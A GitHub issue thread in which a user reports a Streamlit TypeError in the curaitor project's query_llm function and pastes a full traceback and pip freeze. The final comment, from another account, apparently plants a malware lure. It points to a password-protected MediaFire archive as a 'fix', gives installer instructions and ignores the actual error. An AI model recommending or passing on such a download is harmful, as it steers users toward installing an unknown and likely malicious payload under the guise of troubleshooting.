### ISSUE TITLE
Running error - 

### ISSUE THREAD

**Issue by DrKenReid** [mmore500/curaitor#39]
PDF file used was this arXiv paper: https://arxiv.org/html/2402.00234v1

OS: W11
Running on Python 3.12.4

```
None of PyTorch, TensorFlow >= 2.0, or Flax have been found. Models won't be available and only tokenizers, configuration and file/data utilities can be used.
Cleaned text has been written to file: output\text_files\2402.00234v1_output_text.txt
Processing files:   0%|                                                                          | 0/1 [00:00<?, ?it/s]document has 17 pages.
Processing files (Processed: 1/1): 100%|█████████████████████████████████████████████████| 1/1 [00:00<00:00,  1.99it/s]
Cleaned text has been written to file: output\text_files\2402.00234v1_output_text.txt
Cleaning 2402.00234v1_output_text.txt...
2402.00234v1_output_text.txt has been cleaned.
Cleaning paper3_output_text.txt...
paper3_output_text.txt has been cleaned.
Cleaning paper4_output_text.txt...
paper4_output_text.txt has been cleaned.
Cleaning paper5_output_text.txt...
paper5_output_text.txt has been cleaned.
Processing files: 100%|██████████████████████████████████████████████████████████████████| 4/4 [00:01<00:00,  2.52it/s]
Adding embeddings...
Saving data...
Data saved successfully.
2024-08-30 10:05:18.941 Uncaught app exception
Traceback (most recent call last):
  File "C:\Users\Ken\AppData\Local\Programs\Python\Python312\Lib\site-packages\streamlit\runtime\scriptrunner\script_runner.py", line 589, in _run_script
    exec(code, module.__dict__)
  File "C:\Users\Ken\curaitor\script\curaitor.py", line 101, in <module>
    response = query_llm(question, prompt, key_file_path, llm_type)
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\Ken\curaitor\script\queryText.py", line 155, in query_llm
    full_output = chain.invoke({"Context": {relevant_text}})
                                           ^^^^^^^^^^^^^^^
TypeError: unhashable type: 'numpy.ndarray'
```

pip freeze
```
C:\Users\Ken\curaitor>pip freeze
aiohttp==3.9.5
aiosignal==1.3.1
alabaster==0.7.16
altair==5.4.1
annotated-types==0.7.0
anyio==4.4.0
argon2-cffi==23.1.0
argon2-cffi-bindings==21.2.0
arrow==1.3.0
asttokens==2.4.1
async-lru==2.0.4
attrs==23.2.0
Babel==2.15.0
backoff==2.0.1
beautifulsoup4==4.12.3
black==23.12.1
bleach==6.1.0
blinker==1.8.2
cachetools==5.5.0
certifi==2024.6.2
cffi==1.16.0
charset-normalizer==3.3.2
click==8.1.7
colorama==0.4.6
comm==0.2.2
contourpy==1.2.1
cycler==0.12.1
dataclasses-json==0.6.7
debugpy==1.8.1
decorator==5.1.1
defusedxml==0.7.1
distro==1.9.0
distutils-strtobool==0.1.0
docutils==0.20.1
execnet==2.1.1
executing==2.0.1
fastjsonschema==2.20.0
filelock==3.15.4
fonttools==4.53.0
fqdn==1.5.1
frozenlist==1.4.1
fsspec==2024.6.1
gitdb==4.0.11
GitPython==3.1.43
greenlet==3.0.3
h11==0.14.0
httpcore==1.0.5
httpx==0.27.0
huggingface-hub==0.23.4
idna==3.7
imagesize==1.4.1
importlib_metadata==7.1.0
iniconfig==2.0.0
ipykernel==6.29.4
ipython==8.25.0
ipywidgets==8.1.3
isoduration==20.11.0
isort==5.13.2
jedi==0.19.1
Jinja2==3.1.4
json5==0.9.25
jsonpatch==1.33
jsonpointer==3.0.0
jsonschema==4.22.0
jsonschema-specifications==2023.12.1
jupyter==1.0.0
jupyter-console==6.6.3
jupyter-events==0.10.0
jupyter-lsp==2.2.5
jupyter_client==8.6.2
jupyter_core==5.7.2
jupyter_server==2.14.1
jupyter_server_terminals==0.5.3
jupyterlab==4.2.2
jupyterlab_pygments==0.3.0
jupyterlab_server==2.27.2
jupyterlab_widgets==3.0.11
keyname==0.6.0
kiwisolver==1.4.5
langchain==0.2.6
langchain-community==0.2.6
langchain-core==0.2.10
langchain-text-splitters==0.2.2
langsmith==0.1.82
markdown-it-py==3.0.0
MarkupSafe==2.1.5
marshmallow==3.21.3
matplotlib==3.9.0
matplotlib-inline==0.1.7
mdurl==0.1.2
mistune==3.0.2
more-itertools==10.3.0
multidict==6.0.5
mypy-extensions==1.0.0
narwhals==1.5.5
nbclient==0.10.0
nbconvert==7.16.4
nbformat==5.10.4
nest-asyncio==1.6.0
notebook==7.2.1
notebook_shim==0.2.4
numpy==1.26.4
ollama==0.2.1
openai==1.35.3
orjson==3.10.5
osfclient==0.0.5
outcome==1.3.0.post0
overrides==7.7.0
packaging==24.1
pandas==2.2.2
pandocfilters==1.5.1
parso==0.8.4
pathspec==0.12.1
pdfminer==20191125
pexpect==4.9.0
pillow==10.3.0
platformdirs==4.2.2
pluggy==1.5.0
prometheus_client==0.20.0
prompt_toolkit==3.0.47
protobuf==5.28.0
psutil==6.0.0
ptyprocess==0.7.0
pure-eval==0.2.2
py==1.11.0
pyarrow==17.0.0
pycparser==2.22
pycryptodome==3.20.0
pydantic==2.7.4
pydantic_core==2.18.4
pydeck==0.9.1
Pygments==2.18.0
pyparsing==3.1.2
pypdf==4.2.0
PySocks==1.7.1
pytest==8.2.2
pytest-xdist==3.6.1
python-dateutil==2.9.0.post0
python-dotenv==1.0.1
python-json-logger==2.0.7
python-slugify==8.0.4
pytz==2024.1
pywin32==306
pywinpty==2.0.13
PyYAML==6.0.1
pyzmq==26.0.3
qtconsole==5.5.2
QtPy==2.4.1
referencing==0.35.1
regex==2024.5.15
requests==2.32.3
retry==0.9.2
rfc3339-validator==0.1.4
rfc3986-validator==0.1.1
rich==13.8.0
rpds-py==0.18.1
ruff==0.4.9
safetensors==0.4.3
seaborn==0.13.2
selenium==4.19.0
Send2Trash==1.8.3
setuptools==74.0.0
six==1.16.0
smmap==5.0.1
sniffio==1.3.1
snowballstemmer==2.2.0
sortedcontainers==2.4.0
soupsieve==2.5
Sphinx==7.3.7
sphinx-rtd-theme==2.0.0
sphinxcontrib-applehelp==1.0.8
sphinxcontrib-devhelp==1.0.6
sphinxcontrib-htmlhelp==2.0.5
sphinxcontrib-jquery==4.1
sphinxcontrib-jsmath==1.0.1
sphinxcontrib-qthelp==1.0.7
sphinxcontrib-serializinghtml==1.1.10
SQLAlchemy==2.0.31
stack-data==0.6.3
streamlit==1.36.0
tabula==1.0.5
teeplot==1.0.1
tenacity==8.4.2
terminado==0.18.1
text-unidecode==1.3
tiktoken==0.7.0
tinycss2==1.3.0
tokenize-rt==5.2.0
tokenizers==0.19.1
toml==0.10.2
tornado==6.4.1
tqdm==4.66.4
traitlets==5.14.3
transformers==4.41.2
trio==0.26.0
trio-websocket==0.11.1
types-python-dateutil==2.9.0.20240316
typing-inspect==0.9.0
typing_extensions==4.12.2
tzdata==2024.1
uri-template==1.3.0
urllib3==2.2.2
watchdog==4.0.2
watermark==2.4.3
wcwidth==0.2.13
webcolors==24.6.0
webdriver-manager==4.0.1
webencodings==0.5.1
websocket-client==1.8.0
widgetsnbextension==4.0.11
wsproto==1.2.0
yarl==1.9.4
zipp==3.19.2
```

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
